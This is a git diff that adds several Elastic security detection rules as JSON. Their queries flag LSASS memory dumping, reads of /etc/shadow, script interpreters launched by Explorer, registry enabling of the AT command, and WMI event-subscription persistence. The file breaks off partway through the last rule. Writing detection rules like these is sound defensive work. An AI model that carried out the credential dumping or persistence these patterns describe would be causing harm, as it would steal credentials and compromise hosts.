-0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious access to LSASS handle from a call trace pointing to DBGHelp.dll or DBGCore.dll, which both export the MiniDumpWriteDump method that can be used to dump LSASS memory content in preparation for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via LSASS Memory Dump", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* DLLs exporting MiniDumpWriteDump API to create an lsass mdmp*/\n winlog.event_data.CallTrace : (\"*dbghelp*\", \"*dbgcore*\") and\n\n /* case of lsass crashing */\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\"\n )\n", + "references": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "9960432d-9b26-409f-972b-839a959e79e2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic:Execution", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 209 + }, + "id": "9960432d-9b26-409f-972b-839a959e79e2_209", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_208.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_208.json new file mode 100644 index 00000000000..a84a8484ca2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_208.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies access to the /etc/shadow file via the commandline using standard system utilities. After elevating privileges to root, threat actors may attempt to read or dump this file in order to gain valid credentials. They may utilize these to move laterally undetected and access additional resources.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Shadow File Read via Command Line Utilities", + "new_terms_fields": [ + "process.command_line", + "host.id", + "process.executable" + ], + "query": "host.os.type : \"linux\" and event.category : \"process\" and event.action : (\"exec\" or \"exec_event\") and\n(process.args : \"/etc/shadow\" or (process.working_directory: \"/etc\" and process.args: \"shadow\")) and not \n(process.executable : (\"/bin/chown\" or \"/usr/bin/chown\") and process.args : \"root:shadow\") and not \n(process.executable : (\"/bin/chmod\" or \"/usr/bin/chmod\") and process.args : \"640\")\n", + "references": [ + "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9a3a3689-8ed1-4cdb-83fb-9506db54c61f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.008", + "name": "/etc/passwd and /etc/shadow", + "reference": "https://attack.mitre.org/techniques/T1003/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 208 + }, + "id": "9a3a3689-8ed1-4cdb-83fb-9506db54c61f_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_108.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_108.json new file mode 100644 index 00000000000..c65e9ac22f4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_108.json @@ -0,0 +1,157 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious Windows explorer child process. Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Explorer Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n process.name : (\"cscript.exe\", \"wscript.exe\", \"powershell.exe\", \"rundll32.exe\", \"cmd.exe\", \"mshta.exe\", \"regsvr32.exe\") or\n process.pe.original_file_name in (\"cscript.exe\", \"wscript.exe\", \"PowerShell.EXE\", \"RUNDLL32.EXE\", \"Cmd.Exe\", \"MSHTA.EXE\", \"REGSVR32.EXE\")\n ) and\n /* Explorer started via DCOM */\n process.parent.name : \"explorer.exe\" and process.parent.args : \"-Embedding\" and\n not process.parent.args:\n (\n /* Noisy CLSID_SeparateSingleProcessExplorerHost Explorer COM Class IDs */\n \"/factory,{5BD95610-9434-43C2-886C-57852CC8A120}\",\n \"/factory,{ceff45ee-c862-41de-aee2-a022c81eda92}\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_109.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_109.json new file mode 100644 index 00000000000..3e6a7b5bbfb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_109.json @@ -0,0 +1,157 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious Windows explorer child process. Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Explorer Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n process.name : (\"cscript.exe\", \"wscript.exe\", \"powershell.exe\", \"rundll32.exe\", \"cmd.exe\", \"mshta.exe\", \"regsvr32.exe\") or\n process.pe.original_file_name in (\"cscript.exe\", \"wscript.exe\", \"PowerShell.EXE\", \"RUNDLL32.EXE\", \"Cmd.Exe\", \"MSHTA.EXE\", \"REGSVR32.EXE\")\n ) and\n /* Explorer started via DCOM */\n process.parent.name : \"explorer.exe\" and process.parent.args : \"-Embedding\" and\n not process.parent.args:\n (\n /* Noisy CLSID_SeparateSingleProcessExplorerHost Explorer COM Class IDs */\n \"/factory,{5BD95610-9434-43C2-886C-57852CC8A120}\",\n \"/factory,{ceff45ee-c862-41de-aee2-a022c81eda92}\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_108.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_108.json new file mode 100644 index 00000000000..744c57ac710 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_108.json @@ -0,0 +1,114 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to enable the Windows scheduled tasks AT command via the registry. Attackers may use this method to move laterally or persist locally. The AT command has been deprecated since Windows 8 and Windows Server 2012, but still exists for backwards compatibility.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Scheduled Tasks AT Command Enabled", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\Configuration\\\\EnableAt\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\Configuration\\\\EnableAt\"\n ) and registry.data.strings : (\"1\", \"0x00000001\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-scheduledjob" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.002", + "name": "At", + "reference": "https://attack.mitre.org/techniques/T1053/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_109.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_109.json new file mode 100644 index 00000000000..408e9b20baa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_109.json @@ -0,0 +1,114 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to enable the Windows scheduled tasks AT command via the registry. Attackers may use this method to move laterally or persist locally. The AT command has been deprecated since Windows 8 and Windows Server 2012, but still exists for backwards compatibility.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Scheduled Tasks AT Command Enabled", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\Configuration\\\\EnableAt\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\Configuration\\\\EnableAt\"\n ) and registry.data.strings : (\"1\", \"0x00000001\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-scheduledjob" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.002", + "name": "At", + "reference": "https://attack.mitre.org/techniques/T1053/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_110.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_110.json new file mode 100644 index 00000000000..fc624d7b8d3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_110.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via WMI Event Subscription", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"wmic.exe\" or ?process.pe.original_file_name == \"wmic.exe\") and\n process.args : \"create\" and\n process.args : (\"ActiveScriptEventConsumer\", \"CommandLineEventConsumer\")\n", + "references": [ + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.003", + "name": "Windows Management Instrumentation Event Subscription", + "reference": "https://attack.mitre.org/techniques/T1546/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_111.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_111.json new file mode 100644 index 00000000000..f30772b563c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_111.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via WMI Event Subscription", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"wmic.exe\" or ?process.pe.original_file_name == \"wmic.exe\") and\n process.args : \"create\" and\n process.args : (\"ActiveScriptEventConsumer\", \"CommandLineEventConsumer\")\n", + "references": [ + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 